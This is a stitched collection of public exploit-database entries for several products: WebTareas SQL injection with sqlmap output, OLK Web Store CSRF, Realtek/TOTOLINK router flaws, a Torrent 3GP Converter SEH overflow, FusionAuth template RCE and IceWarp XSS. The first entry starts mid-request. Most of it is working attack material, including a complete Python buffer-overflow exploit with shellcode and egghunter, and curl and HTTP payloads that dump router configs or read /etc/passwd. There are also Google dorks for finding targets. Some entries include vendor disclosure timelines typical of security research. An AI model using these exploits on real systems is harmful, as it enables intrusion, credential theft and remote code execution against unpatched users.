Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 98
Origin: http://10.61.57.147
Connection: close
Referer: http://10.61.57.147/webtareas/general/home.php?
Cookie: webTareasSID=npmmte1hejtnsi35mcqbc97gse

action=cardview-actions&prefix=..%2F&object=projects&tblnam=projects&extra=&extpath=&id=1[Vulnerable parameter!]&defact=Y

--------------------------------------------------------------------------------------------------------------------------

C:\Users\--------\Desktop\sqlmap>sqlmap.py -r webt01
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.4.1.17#dev}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:09:44 /2020-01-23/

[12:09:44] [INFO] parsing HTTP request from 'webt01'
[12:09:45] [WARNING] provided value for parameter 'extra' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[12:09:45] [WARNING] provided value for parameter 'extpath' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[12:09:45] [INFO] resuming back-end DBMS 'mysql'
[12:09:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=cardview-actions&prefix=../&object=projects&tblnam=projects&extra=&extpath=&id=1' AND 4597=4597 AND 'yvIt'='yvIt&defact=Y

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=cardview-actions&prefix=../&object=projects&tblnam=projects&extra=&extpath=&id=1' AND (SELECT 4838 FROM (SELECT(SLEEP(5)))WYXW) AND 'lBki'='lBki&defact=Y
---
[12:09:45] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.41, PHP 7.3.13
back-end DBMS: MySQL >= 5.0.12
[12:09:45] [INFO] fetched data logged to text files under 'C:\Users\--------\AppData\Local\sqlmap\output\10.61.57.147'

[*] ending @ 12:09:45 /2020-01-23/

https://github.com/Gr3gPr1est/BugReport/blob/master/WebTareas2.0_Authenticated_SQLinjection_0day.pdf

# Exploit Title: OLK Web Store 2020 - Cross-Site Request Forgery
# Google Dork: intext:"TopManage ® 2002 - 2020"
# Date: 2020-01-13
# Exploit Author: Joel Aviad Ossi
# Vendor Homepage: http://www.topmanage.com/
# Software Link: http://www.topmanage.com/microsites/olk-web-store/
# Version: 2020
# Tested on: N/A
# CVE : N/A

# Reference: https://websec.nl/news.php 

POST /olk/client/login.asp HTTP/1.1
Host: examplesite.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
Origin: https://examplesite.com
Connection: close
Referer: https://examplesite.com/olk/client/login.asp?se=Y
Cookie: myLng=en; ASPSESSIONIDCGARQSCD=JGFFLBIAAKGBKANKLAPHMEDH
Upgrade-Insecure-Requests: 1

dbID=0&UserName=%22%3EPOC&Password=%22%3ECSRF&newLng=en&btnEnter=Enter&sHeight=400&other=

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
             MULTIPLE VULNERABILITIES IN SEVERAL SERIES OF
              REALTEK SDK BASED ROUTERS (TOTOLINK AND MANY
                                 OTHER)


                          Blazej Adamczyk (br0x)
                        blazej.adamczyk@gmail.com
                          https://sploit.tech/
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━


                               11.12.2019





1 Sensitive data disclosure and incorrect access control in several series
of Realtek SDK based routers
══════════════════════════════════════════════════════════════════════════

  CVE: CVE-2019-19822

  SDK vendor: Realtek

  Device vendor: TOTOLINK, Sapido, CIK Telecom, Fibergate Inc.,
  MAX-C300N, T-BROAD and possibly others..

  Product: Realtek SDK based routers backed by Boa HTTP server (and
  possibly others) and using apmib library for memory management.

  Boa Version: <= Boa/0.94.14rc21 SDK Version: < 2020/02/15

  Description: Realtek SDK based routers which use form based instead
  HTTP Basic authentication (that includes Realtek APMIB 0.11f and Boa
  HTTP server 0.94.14rc21) allows remote attackers to retrieve the
  configuration, including sensitive data (usernames and passwords).

  This affects:
• TOTOLINK A3002RU through 2.0.0,
• TOTOLINK 702R through 2.1.3,
• TOTOLINK N301RT through 2.1.6,
• TOTOLINK N302R through 3.4.0,
• TOTOLINK N300RT through 3.4.0,
• TOTOLINK N200RE through 4.0.0,
• TOTOLINK N150RT through 3.4.0, and
• TOTOLINK N100RE through 3.4.0;
• Rutek RTK 11N AP through 2019-12-12;
• Sapido GR297n through 2019-12-12;
• CIK TELECOM MESH ROUTER through 2019-12-12;
• KCTVJEJU Wireless AP through 2019-12-12;
• Fibergate FGN-R2 through 2019-12-12;
• Hi-Wifi MAX-C300N through 2019-12-12;
• HCN MAX-C300N through 2019-12-12;
• T-broad GN-866ac through 2019-12-12;
• Coship EMTA AP through 2019-12-12; and
• IO-Data WN-AC1167R through 2019-12-12; and
• possibly others.

  Technical details: The apmib library at some point of initialization
  dumps the whole memory contents the file /web/config.dat. This folder
  is actually used by the boa http server as index directory.
  Additionally if the router is configured for form-based authentication
  the access control verifies credentials only for some URLs but ".dat"
  files are not restricted. This issue does not affect routers which use
  HTTP Basic authentication to secure all URLs.

  PoC:
┌────
│ $ curl http://routerip/config.dat
└────


2 Password stored in plaintext in Realtek SDK based routers
═══════════════════════════════════════════════════════════

  CVE: CVE-2019-19823

  SDK vendor: Realtek

  Device vendor: TOTOLINK, Sapido, CIK Telecom, Fibergate Inc.,
  MAX-C300N, T-BROAD and possibly others..

  Product: Realtek SDK based routers backed by Boa HTTP server (and
  possibly others) and using apmib library for memory management.

  Boa Version: <= Boa/0.94.14rc21 SDK Version: < 2020/02/15

  Description: Realtek SDK based routers (that includes Realtek APMIB
  0.11f and Boa HTTP server 0.94.14rc21) store passwords in plaintext.

  This affects:
• TOTOLINK A3002RU through 2.0.0,
• TOTOLINK 702R through 2.1.3,
• TOTOLINK N301RT through 2.1.6,
• TOTOLINK N302R through 3.4.0,
• TOTOLINK N300RT through 3.4.0,
• TOTOLINK N200RE through 4.0.0,
• TOTOLINK N150RT through 3.4.0, and
• TOTOLINK N100RE through 3.4.0;
• Rutek RTK 11N AP through 2019-12-12;
• Sapido GR297n through 2019-12-12;
• CIK TELECOM MESH ROUTER through 2019-12-12;
• KCTVJEJU Wireless AP through 2019-12-12;
• Fibergate FGN-R2 through 2019-12-12;
• Hi-Wifi MAX-C300N through 2019-12-12;
• HCN MAX-C300N through 2019-12-12;
• T-broad GN-866ac through 2019-12-12;
• Coship EMTA AP through 2019-12-12; and
• IO-Data WN-AC1167R through 2019-12-12; and
• possibly others.

  Technical details: Data stored in memory in COMPCS (apmib library)
  format contains device administration and other passwords in
  plaintext. The apmib library additionally at some point of
  initialization dumps the whole memory contents the file
  /web/config.dat which might be used to easily retrieve user passwords.


3 Code execution in several TOTOLINK routers
════════════════════════════════════════════

  CVE: CVE-2019-19824

  Vendor: TOTOLINK

  Product: TOTOLINK Realtek SDK based routers

  Boa Version: <= Boa/0.94.14rc21

  Description: On several Realted SDK based TOTOLINK routers, an
  authenticated attacker may execute arbitrary OS commands via the
  sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI
  (syscmd.htm) is not available. This allows for full control over the
  device's internals.

  This affects:
• A3002RU through 2.0.0,
• A702R through 2.1.3,
• N301RT through 2.1.6,
• N302R through 3.4.0,
• N300RT through 3.4.0,
• N200RE through 4.0.0,
• N150RT through 3.4.0,
• N100RE through 3.4.0, and
• possibly others.

  PoC:
┌────
│ $ curl 'http://routerip/boafrm/formSysCmd' --user "admin:password"
│   --data 'submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&
│   save_apply=Run+Command&sysCmd=cp%20%2Fetc%2Fpasswd%20%2Fweb%2Fxxxx.dat'
└────


4 Incorrectly implemented captcha protection in TOTOLINK routers
════════════════════════════════════════════════════════════════

  CVE: CVE-2019-19825

  Vendor: TOTOLINK

  Product: TOTOLINK Realtek SDK based routers

  Boa Version: <= Boa/0.94.14rc21

  Description: Guessable captcha vulnerability (CWE-804) in several
  series of TOTOLINK routers allows a remote attacker to automatically
  login to the router without reading and providing real captcha.

  The following command returns captcha in plain text:
┌────
│ $ curl 'http://routerip/boafrm/formLogin' --data '{"topicurl":"setting/getSanvas"}'
└────

  Additionally by using the HTTP Basic in a HEADER the attacker can
  execute router actions without providing captcha at all.

  This affects:
• A3002RU through 2.0.0,
• A702R through 2.1.3,
• N301RT through 2.1.6,
• N302R through 3.4.0,
• N300RT through 3.4.0,
• N200RE through 4.0.0,
• N150RT through 3.4.0,
• N100RE through 3.4.0, and
• possibly others.


5 Exploiting all together on TOTOLINK routers
═════════════════════════════════════════════

  CVSS v3 socre: 9.6 AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H (assuming
  Administrative Access on WAN is enabled the score is 10.0)

  Exploiting all the vulnerabilities together allows a remote
  unauthenticated attacker to execute any code with root permissions and
  reveal administration password.

  The only thing that is needed is the access to router administration
  interface (either access to local network or Administrative Access on
  WAN enabled)

  Description, video and possibly an exploit:
  https://sploit.tech/2019/12/16/Realtek-TOTOLINK.html

  Timeline:
• 17.12.2019 - Contacted all identified vendors, i.e. TOTOLINK, CIK
    Telecom, Sapido, Fibergate and Coship.
• 18.12.2019 - received TOTOLINK first line support response totally
    not related to my message and showing me how to log into my router.
    I responded right away and asked to forward the message to
    technical/security team.
• 19.12.2019 - received response from CIK Telecom stating that the
    routers support encryption (SIC!). I replied asking to forward the
    message to technical/security team.
• 19.12.20219 - CIK Telecom responded that for further assistance I
    should contact them over the phone. I replied that I need to explain
    the details as a written message as this is technical.
• 27.12.2019, 06.01.2020 - I resent the messages to TOTOLINK and CIK
    Telecom but none have replied till the date of disclosure.
• 06.01.2020 - I finally contacted Realtek as the Supplier of the SDK.
• 10.01.2020 - I got a response and I replied with encrypted details
    on the bugs.
• 14-15.01.2020 - Realtek replied that the issue with dumping
    configuration by apmib exists but it is not directly exploitable in
    the defualt SDK configuration becuase it uses HTTP Basic
    authentication which protects all URLs. They agreed however that
    most of the Vendors modify the software including authentication
    mechanism thus making it vulnerable.
• 23.01.2020 - Realtek responded that they are goining to fix the
    issue with dumping configuration to the config.dat file in version
    released on 15.02.2020. They also said that after fixing the issue
    the impact of storing password in plaintext is less significant thus
    they will not fix the CVE-2019-19823 yet but will try to fix it in
    the future.

  Temporary workaround: Unfortunately I did not get any good information
  from real vendors like TOTOLINK and for now I would suggest to disable
  administration interface from WAN and restricting LAN router
  administration interface access using some kind of firewall if
  possible.

  Credit: Blazej Adamczyk | blazej.adamczyk@gmail.com | http://sploit.tech/

# Exploit Title: Torrent 3GP Converter 1.51 - Stack Overflow (SEH)
# Exploit Author: boku
# Date: 2020-01-24
# Software Vendor: torrentrockyou
# Vendor Homepage: http://www.torrentrockyou.com
# Software Link: http://www.torrentrockyou.com/download/tr3gpconverter.exe
# Version: Torrent 3GP Converter Version 1.51 Build 116
# Tested On: Windows 10 Home (x86) 10.0.18363 Build 18363
# Tested On: Windows 10 Education (x86) 10.0.18363 Build 18363
# Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363
# Recreate:
#  1) Download, install, and open Torrent 3GP Converter 1.51 Build 116 for windows x86
#  2) run python script & open created 'crash.txt' file
#  3) select-all > copy-all
#  4) in app, click 'Register' on the bottom
#  5) in 'Name:' textbox enter 'a'
#  6) in 'Code:' textbox paste buffer
#  7) click 'OK', calculator will open & app will crash

#!/usr/bin/python

# Bad Chars 
# \x00 => \x20 # \x0d Truncates buffer # \x2d Gets ejected from buffer
# \x61-\x6f => \x41-\x4f / ASCII Lower => ASCII Upper
# \x70-\x7a => \x50-\x5a / ASCII Lower => ASCII Upper
# \x9a => \x8a # \x9c => \x8c # \x9e => \x8e
# \xe0-\xef => \xc0-\xcf # \xf0-\xf6 => \xd0-\xd6
# \xf8-\xfe => \xd8-\xde # \xff => \x9f
# badChars='\x00\x0d\x2d\x61\x62\x63\64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x9a\x9c\x9e\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xee\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'
# Max shellcode size is 2384  bytes
# - First 2384 bytes of our buffer is left unmangled on the stack
# msfvenom -p windows/exec CMD='calc' -e x86/alpha_upper --format python -v shellcode
# x86/alpha_upper chosen with final size 447
# Payload size: 447 bytes
## msfvenom x86/alpha_uppers GetPC Routine ##
#  [!] Does not work because of the bad chars!
# Manually replaced with a working version of GetPC for this exploit
# 89E5            mov ebp, esp
shellcode = b'\x54\x5D' # push esp # pop ebp
# DBCD            fcmovne st, st(5)
shellcode += b'\x89\xCF' # mov edi, ecx
# D975 F4         fstenv [ebp-C]
shellcode += b'\x47\x47\x90' # inc edi # inc edi # nop
# 5F              pop edi  
shellcode += b'\x90' # nop
shellcode += b"\x57\x59\x49"
shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
shellcode += b"\x49\x4b\x4c\x5a\x48\x4d\x52\x55\x50\x55\x50"
shellcode += b"\x33\x30\x43\x50\x4b\x39\x4b\x55\x46\x51\x59"
shellcode += b"\x50\x42\x44\x4c\x4b\x30\x50\x36\x50\x4c\x4b"
shellcode += b"\x56\x32\x34\x4c\x4c\x4b\x56\x32\x42\x34\x4c"
shellcode += b"\x4b\x34\x32\x31\x38\x34\x4f\x4e\x57\x50\x4a"
shellcode += b"\x37\x56\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x35"
shellcode += b"\x31\x43\x4c\x34\x42\x56\x4c\x47\x50\x39\x51"
shellcode += b"\x58\x4f\x34\x4d\x45\x51\x59\x57\x4a\x42\x4a"
shellcode += b"\x52\x46\x32\x56\x37\x4c\x4b\x31\x42\x44\x50"
shellcode += b"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x50\x4c\x42"
shellcode += b"\x31\x33\x48\x4b\x53\x51\x58\x45\x51\x4e\x31"
shellcode += b"\x30\x51\x4c\x4b\x31\x49\x51\x30\x55\x51\x59"
shellcode += b"\x43\x4c\x4b\x30\x49\x42\x38\x4b\x53\x37\x4a"
shellcode += b"\x57\x39\x4c\x4b\x47\x44\x4c\x4b\x53\x31\x59"
shellcode += b"\x46\x46\x51\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
shellcode += b"\x34\x4d\x35\x51\x4f\x37\x57\x48\x4d\x30\x53"
shellcode += b"\x45\x4c\x36\x45\x53\x53\x4d\x4a\x58\x37\x4b"
shellcode += b"\x43\x4d\x46\x44\x33\x45\x4a\x44\x56\x38\x4c"
shellcode += b"\x4b\x36\x38\x47\x54\x45\x51\x38\x53\x32\x46"
shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x50\x58\x45"
shellcode += b"\x4c\x53\x31\x59\x43\x4c\x4b\x45\x54\x4c\x4b"
shellcode += b"\x33\x31\x38\x50\x4d\x59\x57\x34\x57\x54\x36"
shellcode += b"\x44\x31\x4b\x51\x4b\x33\x51\x36\x39\x31\x4a"
shellcode += b"\x50\x51\x4b\x4f\x4d\x30\x51\x4f\x31\x4f\x50"
shellcode += b"\x5a\x4c\x4b\x45\x42\x5a\x4b\x4c\x4d\x51\x4d"
shellcode += b"\x52\x4a\x35\x51\x4c\x4d\x4c\x45\x48\x32\x35"
shellcode += b"\x50\x43\x30\x33\x30\x46\x30\x43\x58\x46\x51"
shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f"
shellcode += b"\x4b\x5a\x50\x38\x35\x39\x32\x31\x46\x53\x58"
shellcode += b"\x4e\x46\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x58"
shellcode += b"\x55\x47\x4c\x35\x56\x43\x4c\x35\x5a\x4b\x30"
shellcode += b"\x4b\x4b\x4d\x30\x42\x55\x44\x45\x4f\x4b\x37"
shellcode += b"\x37\x45\x43\x54\x32\x32\x4f\x42\x4a\x55\x50"
shellcode += b"\x36\x33\x4b\x4f\x58\x55\x45\x33\x55\x31\x32"
shellcode += b"\x4c\x43\x53\x35\x50\x41\x41"
# Stack EggHunter for fun & profit 
egg = 'BOKU'
hunterOS = '\x41'*(2784-len(egg+egg+shellcode))
# After executing the code in nSEH, we are left with 88 bytes to create our Hunter
hunter  = '\x4C'*4 # dec esp * 4 / avoid sub bad char / topOfStack=GetPC
hunter  += '\x5B' # pop ebx / EBX=PC
hunter  += '\x80\x43\x29\x20'     #   add byte [ebx+41], 0x20 / 20+55=7F=jnz
hunter  += '\x80\x43\x33\x20'     #   add byte [ebx+51], 0x20 / 20+55=7F=jnz
hunter  += '\xB8\x42\x4F\x4B\x55' # mov eax,0x424f4b55
hunter  += '\x54' # push esp
hunter  += '\x59' # pop ecx
hunter  += '\x90'*18 # nop fillers for jnz short -7 loop
hunter  += '\x49' # dec ecx
hunter  += '\x3B\x01' # cmp eax, [ecx]
hunter  += '\x55\xF7' # 75F7 = jnz short -7 / Have to avoid bad \xF- chars
hunter  += '\x51' # push ecx
hunter  += '\x5a' # pop edx
hunter  += '\x4a'*4 # dec edx * 4 / check if second egg matchs
hunter  += '\x3B\x02' # cmp eax, [edx]
hunter  += '\x55\xDF' # jnz short -31 / back to the loop - avoid bad chars
hunter  += '\x83\xc1\04' # add ecx, 0x4 / start of shellcode after eggs
hunter  += '\x31\xd2' # xor edx,edx
hunter  += '\x52' # push edx
hunter  += '\xC6\x44\x24\x02\x4B' # mov byte [esp+0x2],0x4b
hunter  += '\xC6\x44\x24\x01\x44' # mov byte [esp+0x1],0x44
hunter  += '\xC6\x04\x24\x39'     # mov byte [esp],0x39
# [ESP]=0x004b4439 : call ecx | startnull,asciiprint,ascii,alphanum,uppernum {PAGE_EXECUTE_READWRITE} [bsvideoconverter.exe]
#   ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.2.8.1 (C:\Program Files\Torrent 3GP Converter\bsvideoconverter.exe)
hunter  += '\xc3' # ret
huntRmdr = '\x41'*(88-len(hunter))
nsehOS   = '\x90'*(4500-len(egg+egg+shellcode+hunterOS+hunter+huntRmdr))
nSEH     = '\x83\xC4\x04\xC3'     # add esp,byte +0x4 # ret
# 3-byte SEH overwrite using the truncating Null byte
SEH      = '\x0f\x47\x4c' # 0x004c470f : pop esi # pop ebx # ret [bsvideoconverter.exe] 
         # ASLR: False, Rebase: False, SafeSEH: False {PAGE_EXECUTE_READWRITE} 

payload  = egg+egg+shellcode+hunterOS+hunter+huntRmdr+nsehOS+nSEH+SEH

try:
    f=open("crash.txt","w")
    print("[+] Creating %s bytes evil payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")

@Mediaservice.net Security Advisory #2020-03 (last updated on 2020-01-27)

   Title:  FusionAuth command execution via Apache Freemarker Template
   Application:  FusionAuth 1.10 and lower
     Platforms:  Tested on Windows 10 and Ubuntu 19.10
   Description:  An authenticated attacker with enough privileges to access the
    template editing functions (either site templates or e-mail
    templates) in the FusionAuth dashboard can execute commands on
                the underlying operating system using the Apache FreeMarker
                Expression language. 
        Author:  Gianluca Baldi <gianluca.baldi@mediaservice.net>
 Vendor Status:  https://fusionauth.io/contact - notified on 2019-10-24
      CVE Name:  CVE-2020-7799
    References: https://lab.mediaservice.net/advisory/2020-03-fusionauth.txt
    https://fusionauth.io/
    https://freemarker.apache.org/
    https://www.mediaservice.net/

1. Abstract.

FusionAuth is a modern Access Management open source application, that can be
integrated with multiple technologies and platforms. FusionAuth can be
configured and customized in many ways from the administration dashboard and to
do so privileged acounts can modify templates.

FusionAuth Templates are in fact Apache Freemarker Templates, that are
interpreted by the Apache Freemarker Templates Engine. Since it is possible to
execute system commands using the Apache Freemarker Expression language,
template editing features can be abused to execute remote commands effectively,
using the "freemarker.template.utility.Execute" object.

2. Affected Platforms.

This vulnerability is platform-independent.

3. Fix.

This vulnerability has been fixed in version 1.11 of FusionAuth.

4. Proof of Concept.

Example POST request (Home -> Settings -> Email Templates -> Preview):

POST /ajax/email/template/preview HTTP/1.1
Host: 192.168.0.3:9011
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 796
DNT: 1
Connection: close
Referer: http://192.168.0.3:9011/admin/email/template/edit/2c2591f5-2136-4a77-8b5a-1f5e9fb0e25b
Cookie: JSESSIONID=FA9DB3CBABA6B37E5336AE4B96001807; 

primeCSRFToken=kRC228UjAA4ohN_E9PW9kz0HpTlxUDCB_HVrDhBUfWU&emailTemplateId=2c2591f5-2136-4a77-8b5a-1f5e9fb0e25b&emailTemplate.name=COPPA%20Notice&emailTemplate.defaultSubject=Notice%20of%20your%20consent&emailTemplate.fromEmail=no-reply%40fusionauth.io&emailTemplate.defaultFromName=FusionAuth&emailTemplate.defaultTextTemplate=You%20recently%20granted%20your%20child%20consent%20in%20our%20system.%20This%20email%20is%20to%20notify%20you%20of%20this%20consent.%20If%20you%20did%20not%20grant%20this%20consent%20or%20wish%20to%20revoke%20this%20consent%2C%20click%20the%20link%20below%3A%0A%0Ahttp%3A%2F%2Fexample.com%2Fconsent%2Fmanage%0A%0A-%20FusionAuth%20Admin&emailTemplate.defaultHtmlTemplate=${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}}

5. Disclosure Timeline

2019-10-23 - First contact (issue in FusionAuth 1.9.1).
2019-10-24 - First PoC sent to the vendor.
2019-10-25 - Vendor investigates the issue.
2019-10-28 - Issue is confirmed and a disclosure date is agreed upon (2020-01-23).
2019-10-29 - Vendor silently releases a fixed version (FusionAauth 1.11.0).
2020-01-20 - Asked for updates on issue.
2020-01-20 - Vendor states that the issue has been fixed already.
2020-01-22 - Assigned CVE-2020-7799.
2019-02-27 - Advisory published.

Copyright (c) 2020 Gianluca Baldi and @Mediaservice.net. All rights reserved.

[+] Title: IceWarp WebMail Cross-Site Scripting Vulnerability
[+] Date: 2020/01/27
[+] Author: Lutfu Mert Ceylan
[+] Vendor Homepage: www.icewarp.com
[+] Tested on: Windows 10
[+] Versions: 11.4.4.1 and before
[+] Vulnerable Parameter: "color" (Get Method)
[+] Vulnerable File: /webmail/
[+} Dork : inurl:/webmail/ intext:Powered by IceWarp Server

# Notes:

An attacker can use XSS (in color parameter IceWarp WebMail 11.4.4.1 and before)to send a malicious script to an unsuspecting Admins or users. The end admins or useras browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. Even an attacker can easily place users in social engineering through this vulnerability and create a fake field.

# PoC:

[+] Go to Sign-in page through this path: http://localhost/webmail/
                                                 or
                                                 http://localhost:32000/webmail/

[+] Add the "color" parameter to the URL and write malicious code, Example: http://localhost/webmail/?color="><svg/onload=alert(1)>

[+] When the user goes to the URL, the malicious code is executed

Example Vulnerable URL: http://localhost/webmail/?color="><svg/onload=alert(1)> (Payload: "><svg/onload=alert(1)>)

# Demo Pictures:

[+] https://i.hizliresim.com/yGY6Zj.png